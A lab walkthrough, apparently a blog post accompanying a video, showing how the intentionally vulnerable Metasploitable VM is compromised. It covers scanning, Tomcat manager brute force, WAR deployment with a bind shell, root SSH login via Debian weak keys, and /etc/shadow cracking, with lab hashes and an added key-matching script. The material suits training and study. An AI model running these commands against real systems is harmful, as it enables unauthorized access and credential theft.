Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826187
Download video: http://www.mediafire.com/?wv748u6o2jabdsw
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2
What is this?
This video demonstrates an attack on the Tomcat service on the Metasploitable hackable box: weak manager credentials give a shell, and a weak (Debian OpenSSL) SSH key in root's authorized_keys turns that shell into root.
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com
"Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org
Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the Tomcat manager login (gaining access)
> Use Metasploit to deploy a WAR payload through the manager and get a shell (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload shell, read /root/.ssh/authorized_keys and compare the public key against the pre-generated weak keys (Debian OpenSSL predictable PRNG, CVE-2008-0166) *Just like pWnOS* (escalating privileges)
> Connect via SSH as root using the matching weak private key (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)
What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> SSH --- on Backtrack 4 (Final)
> John The Ripper --- on BackTrack!
> Dictionaries/Word-lists --- Usernames Passwords
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
Commands:
Code:
nmap 192.168.1.1-255
nmap -sV -sS -O -f -n 192.168.1.105
firefox 192.168.1.105
msfconsole
search tomcat
use scanner/http/tomcat_mgr_login
show options
setg RHOSTS 192.168.1.105
setg RPORT 8180
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
use multi/http/tomcat_mgr_deploy
show options
setg USERNAME tomcat
setg PASSWORD tomcat
show payloads
set payload generic/shell_bind_tcp
show options
exploit
ls
whoami
hostname
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
kate -> Paste -> Save (Filename: /root/shadow)
john
./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst /root/shadow
ssh msfadmin@192.168.1.105
------------------------------------------------------------------------------------
Cracked accounts (user:password = original shadow entry):
root: = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
sys:batman = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
klog:123456789 = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
user:user = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:service = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
------------------------------------------------------------------------------------
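The grep above checks a single pasted key blob against the weak-key archive. As an added example (not part of the original video or post), the script below generalises that step: it walks every key in an authorized_keys file, tolerates option prefixes such as command="...", looks each key blob up in a directory laid out like the archive's rsa/2048 (where the private key has the same name as the .pub file minus the extension, as the ssh -i step above relies on), and prints the private key path to use. The demo() function builds a constructed, throw-away archive and authorized_keys file so it runs offline; the key material in it is fake and only the file layout is assumed.

```bash
#!/usr/bin/env bash
# Added example: match every key in an authorized_keys file against a
# directory of pre-generated weak public keys (rsa/2048/<name>.pub layout
# assumed, private key stored as rsa/2048/<name>).

# find_weak_keys <authorized_keys> <weak_pub_dir>
# Prints the private-key path for every key that matches a weak .pub file.
# Returns 0 if at least one weak key was found, 1 otherwise.
find_weak_keys() {
    local auth_file="$1" weak_dir="$2" hits=0 line blob match
    while IFS= read -r line; do
        # Pull the base64 key blob out of the line; this also works when the
        # entry carries options like command="..." before the key type.
        blob=$(printf '%s\n' "$line" | grep -oE 'AAAA[0-9A-Za-z+/=]+' | head -n 1)
        [ -n "$blob" ] || continue          # blank line, comment, no key
        # Fixed-string search so '+', '/' and '=' in the blob are literal.
        match=$(grep -lrF -- "$blob" "$weak_dir" 2>/dev/null | head -n 1)
        [ -n "$match" ] || continue
        hits=$((hits + 1))
        printf '%s\n' "${match%.pub}"      # private key = .pub name without extension
    done < "$auth_file"
    [ "$hits" -gt 0 ]
}

# demo: constructed sample data (fake key blobs, not real key material).
# Prints the basename of each weak private key found.
demo() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/rsa/2048"
    # Two "weak" keys in the archive; only the first appears in authorized_keys.
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAdemoweakkey== weak\n' > "$d/rsa/2048/0123abcd-1234.pub"
    printf 'FAKE PRIVATE KEY\n' > "$d/rsa/2048/0123abcd-1234"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAotherkey== other\n' > "$d/rsa/2048/ffff0000-9999.pub"
    printf 'FAKE PRIVATE KEY\n' > "$d/rsa/2048/ffff0000-9999"
    # authorized_keys with a comment, a weak key, and a strong key with options.
    {
        printf '# keys for root\n'
        printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAdemoweakkey== root@target\n'
        printf 'command="/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstrongkey== admin\n'
    } > "$d/authorized_keys"
    find_weak_keys "$d/authorized_keys" "$d/rsa/2048" | while IFS= read -r p; do
        basename "$p"
    done
    rm -rf "$d"
}
```

Against a real target the call is find_weak_keys with the authorized_keys contents copied out through the bind shell and the unpacked rsa/2048 directory; each printed path can be passed straight to ssh -i. Only the exact blob is matched, so a key that merely shares the common ssh-rsa header with a weak one is not reported.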
Notes:
Song: Underworld - Cowgirl
Video length: 7:07
Capture length: 11:17
Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30078-%5Bvideo%5D-metasploitable-tomcat.html#post167042